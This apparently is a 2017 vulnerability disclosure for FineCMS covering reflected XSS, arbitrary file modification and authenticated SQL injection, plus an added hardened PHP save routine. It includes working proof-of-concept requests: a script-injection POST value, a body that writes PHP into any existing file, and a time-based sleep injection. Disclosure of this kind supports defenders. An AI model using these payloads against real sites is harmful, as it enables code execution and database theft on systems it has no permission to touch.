
Some Vulnerability for FineCMS through 2017.7.11

2017-07-12 00:10


Reflected XSS in get_image.php

Technical Description:

In /application/lib/ajax/get_image.php, $_POST['id'], $_POST['name'] and $_GET['folder'] are used without any validation, sanitisation or output encoding.

Proof of Concept (PoC)

http://your_finecms/application/lib/ajax/get_image.php?folder=1
POST:
id=1"><script>alert(1)</script>&name=1


Arbitrary File Modify

Technical Description:

The base function that modifies the template CSS and script also lets the caller choose the filename. This leads to arbitrary file modification, which could allow an attacker to get a shell.

In /application/core/controller/style.php, lines 50-53:

The save() function it calls, in /application/core/model/style.php, lines 26-48:

If the file exists, it can be modified without any restriction.

Interestingly, the same function appears in two more files with the same vulnerability.

In /application/core/model/script.php, lines 26-48:

Proof of Concept (PoC)

http://your_finecms/index.php?route=template
http://your_finecms/index.php?route=style
http://your_finecms/index.php?route=script
POST:
contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz
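The root cause above is that "the file exists" is the only check before writing attacker-controlled contents. The following hardened save routine is an added example, not FineCMS code; the template directory, the allowed extensions and the function names are assumptions for illustration.

```php
<?php
// Added example (not FineCMS code): a hardened replacement for a template
// save() that previously accepted any existing filename. Directory, function
// and parameter names below are assumptions for illustration.

const TEMPLATE_DIR = '/var/www/finecms/application/views/';   // assumed base dir
const ALLOWED_EXT  = ['css', 'js', 'tpl'];                     // assumed editable types

/**
 * Return the canonical path if $filename may be edited, or null otherwise.
 * The existence check from the advisory is kept, but it is no longer the
 * only gate between the request and the filesystem.
 */
function resolveEditableTemplate(string $filename): ?string
{
    // 1. Reject path separators and NUL bytes outright; a template name is a
    //    single path component, never "../something".
    if ($filename === '' || strpbrk($filename, "/\\\0") !== false) {
        return null;
    }
    // 2. Allow only a fixed set of extensions, so .php/.phtml can never be
    //    chosen even if such a file exists in the directory.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // 3. Canonicalise and confirm the result is still inside TEMPLATE_DIR
    //    (realpath follows symlinks, so a link pointing elsewhere fails too).
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . $filename);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function saveTemplate(string $filename, string $contents): bool
{
    $path = resolveEditableTemplate($filename);
    if ($path === null) {
        return false;          // refuse; a real deployment should also log this
    }
    return file_put_contents($path, $contents, LOCK_EX) !== false;
}
```

With these checks the PoC body above is refused for any filename that is not a .css/.js/.tpl file directly under the template directory, regardless of whether the target file exists.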


Authenticated SQL injection

FineCMS generally uses PDO to connect to the MySQL server, so although data reaches the database without any validation, sanitisation or output encoding, it is not injectable. In application/core/controller/excludes.php, however, the author connects with mysqli. This leads to a SQL injection that could allow an attacker to use a payload to retrieve data from the database.

Technical Description:

In application/core/controller/excludes.php, line 75, visitor_ip is inserted into the database without any validation, sanitisation or output encoding.


In /stat/get_stat_data.php, line 30:


The injected SQL ends up in sql_query and is executed.

Proof of Concept (PoC)

http://127.0.0.1/finecms/index.php?route=excludes&action=add
POST:
visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz

Then view http://your_finecms/stat/get_stat_data.php; the page load is noticeably delayed by the sleep.



Source: lorexxar.cn/2017/07/11/Some Vulnerability for FineCMS through 2017.7.11/
